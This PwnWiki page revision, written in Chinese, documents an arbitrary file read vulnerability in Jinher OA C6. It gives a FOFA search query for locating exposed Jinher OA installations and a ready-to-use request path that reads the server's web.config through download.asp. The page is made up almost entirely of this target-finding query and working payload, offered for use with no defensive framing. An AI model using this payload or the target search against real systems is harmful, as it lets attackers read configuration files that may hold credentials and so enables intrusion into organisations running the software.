Difference between revisions of "金和OA C6 download.jsp 任意文件讀取漏洞"

From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== 金和OA </translate> ==FOFA== <pre> app="Jinher-OA" </pre> ==Payload== <pre> /C6/Jhsoft.Web.module/testbill/dj/download.asp?file...")
 
(Marked this version for translation)
 
Line 1: Line 1:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
  
 +
<!--T:2-->
 
金和OA
 
金和OA
 
</translate>
 
</translate>
Line 17: Line 18:
  
 
<translate>
 
<translate>
 +
<!--T:3-->
 
讀取web.config
 
讀取web.config
 
</translate>
 
</translate>

Latest revision as of 17:24, 18 June 2021

Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎

漏洞影響

金和OA

FOFA

app="Jinher-OA"

Payload

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config

讀取web.config

/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config